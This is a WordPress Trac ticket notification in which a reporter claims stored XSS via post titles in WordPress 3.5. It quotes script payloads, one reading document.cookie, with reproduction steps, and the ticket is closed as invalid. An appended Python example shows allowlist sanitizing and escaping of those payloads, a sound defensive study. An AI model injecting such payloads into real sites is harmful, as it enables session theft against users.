[wp-trac] [WordPress Trac] #22861: Wordpress 3.5 - Cross Site Scripting Vulnerability
WordPress Trac
noreply at wordpress.org
Tue Dec 11 21:25:27 UTC 2012
#22861: Wordpress 3.5 - Cross Site Scripting Vulnerability
-----------------------------+----------------------
Reporter: shubhammittal01 | Owner:
Type: defect (bug) | Status: closed
Priority: normal | Milestone:
Component: General | Version:
Severity: normal | Resolution: invalid
Keywords: |
-----------------------------+----------------------
Description changed by ocean90:
Old description:
> Hi, My name is Shubham Mittal. I have a bug at new Wordpress (latest
> version, 3.5). This bug is Cross Site Scripting.
>
> [XSS] New Wp-Post
>
> Exploit Title: CMS Wordpress - XSS Vulnerability [[BR]]
> Author : Shubham Mittal[[BR]]
> E-mail : upgoingstaar at gmail.com [[BR]]
> Webpage: http://3ncrypt0r.blogspot.com[[BR]]
> Version CMS : Version 3.5 (Last Version) [[BR]]
> Category : WebApps / Content Management System (CMS) [[BR]]
> Security Risk: Medium Level [[BR]]
> Link Download: http://www.wordpress.org/ [[BR]]
> Tested On : Mozilla Firefox + WAMP + Windows 7 64 Bit
>
> [Information Content]
> WordPress - Web Publishing Software. http://www.wordpress.org/
>
> [Vulnerability Details]
>
> XSS CODE:
> <script>alert("XSSedByShubham")>[[BR]]
> </script<script>alert(document.cookie);</script>[[BR]]
> <script>window.open("http://www.google.com/")</script>
>
> Exploit Report:
> 1. Create / Edit Wp-Post
> Input "Title Post" with script XSS Code.
> <script>alert("XSSedByShubham")</script>
>
> 2. http://example.com/wp-admin/post-new.php <---Publish It
>
> 3. View XSS, Alert Box will pop up. http://example.com/?p=xxx <--XSSed
> [[Image(http://4.bp.blogspot.com/-zNKPa-mQPEc/UMejBt8a3HI/AAAAAAAABQQ/HsG9RQnRwlg/s1600/post+xss.jpg)]]
>
> Thanks
>
> Shubham Mittal
> @upgoingstar
New description:
Hi, My name is Shubham Mittal. I have a bug at new Wordpress (latest
version, 3.5). This bug is Cross Site Scripting.
[XSS] New Wp-Post
Exploit Title: CMS Wordpress - XSS Vulnerability [[BR]]
Author : Shubham Mittal[[BR]]
E-mail : upgoingstaar at gmail.com [[BR]]
Webpage: http://3ncrypt0r.blogspot.com[[BR]]
Version CMS : Version 3.5 (Last Version) [[BR]]
Category : WebApps / Content Management System (CMS) [[BR]]
Security Risk: Medium Level [[BR]]
Link Download: http://www.wordpress.org/ [[BR]]
Tested On : Mozilla Firefox + WAMP + Windows 7 64 Bit
[Information Content]
WordPress - Web Publishing Software. http://www.wordpress.org/
[Vulnerability Details]
XSS CODE:
<script>alert("XSSedByShubham")>[[BR]]
</script<script>alert(document.cookie);</script>[[BR]]
<script>window.open("http://www.google.com/")</script>
Exploit Report:
1. Create / Edit Wp-Post
Input "Title Post" with script XSS Code.
<script>alert("XSSedByShubham")</script>
2. http://example.com/wp-admin/post-new.php <---Publish It
3. View XSS, Alert Box will pop up. http://example.com/?p=xxx <--XSSed
http://4.bp.blogspot.com/-zNKPa-mQPEc/UMejBt8a3HI/AAAAAAAABQQ/HsG9RQnRwlg/s1600/post+xss.jpg
Thanks
Shubham Mittal
@upgoingstar
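The ticket above was closed as invalid. As an added example that is not WordPress code and not part of the ticket, the following Python models the two layers that decide whether an untrusted post title becomes stored XSS: a kses-style tag allowlist applied when the title is saved (WordPress runs post titles through wp_filter_kses for users who lack the unfiltered_html capability, while users who hold that capability, such as administrators, may publish raw HTML by design) and HTML escaping applied when the title is rendered into an attribute. The three payload strings are taken from the report; the allowlist, the helper names and the benign title are assumptions made for the example.

```python
"""Added example (not WordPress code): allowlist sanitization at save time
plus HTML escaping at render time, applied to the titles quoted in the ticket."""
import html
from html.parser import HTMLParser

# Constructed input: the three payloads quoted in the report, plus one benign title.
REPORTED_TITLES = [
    '<script>alert("XSSedByShubham")></script>',
    '</script<script>alert(document.cookie);</script>',
    '<script>window.open("http://www.google.com/")</script>',
]
BENIGN_TITLE = 'Hello <b>world</b> <a href="/about">about</a>'

# Hypothetical allowlist, far smaller than WordPress's own: tag -> permitted attributes.
ALLOWED_TAGS = {"b": set(), "i": set(), "em": set(), "strong": set(), "a": {"href"}}


def _safe_href(value):
    """Assumption: only same-site relative links and http(s) URLs are wanted in href."""
    v = value.strip().lower()
    return v.startswith(("http://", "https://", "/", "#")) and not v.startswith("//")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a title keeping only allowlisted tags; every text node is re-escaped."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text content still arrives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name == "href" and not _safe_href(value):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.parts.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append("</%s>" % tag)

    def handle_data(self, data):
        # Text is escaped, so the body left behind by a dropped <script> is inert.
        self.parts.append(html.escape(data, quote=False))

    # Comments, declarations and processing instructions are dropped outright.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass

    def unknown_decl(self, data):
        pass


def sanitize_title(raw):
    """Save-time filter for an author who may not publish raw HTML."""
    parser = AllowlistSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.parts)


def render_title_attribute(raw):
    """Render-time escaping for an attribute context such as <a title="...">: no tags survive."""
    return html.escape(raw, quote=True)


if __name__ == "__main__":
    for raw in REPORTED_TITLES + [BENIGN_TITLE]:
        print("raw      :", raw)
        print("stored   :", sanitize_title(raw))
        print("attribute:", render_title_attribute(raw))
        print()
```

Running the block prints each title as submitted, as it would be stored after the allowlist filter, and as it would be emitted inside an attribute; the benign title survives the filter unchanged while the three reported payloads lose their script tags and keep only escaped text. The second payload, with its malformed `</script<script>` opening, is the reason the filter is built on a real HTML tokenizer rather than a pattern match on `<script>`: whatever the tokenizer makes of the malformed run, only allowlisted tags are ever written back out.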
--
Ticket URL: <http://core.trac.wordpress.org/ticket/22861#comment:2>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software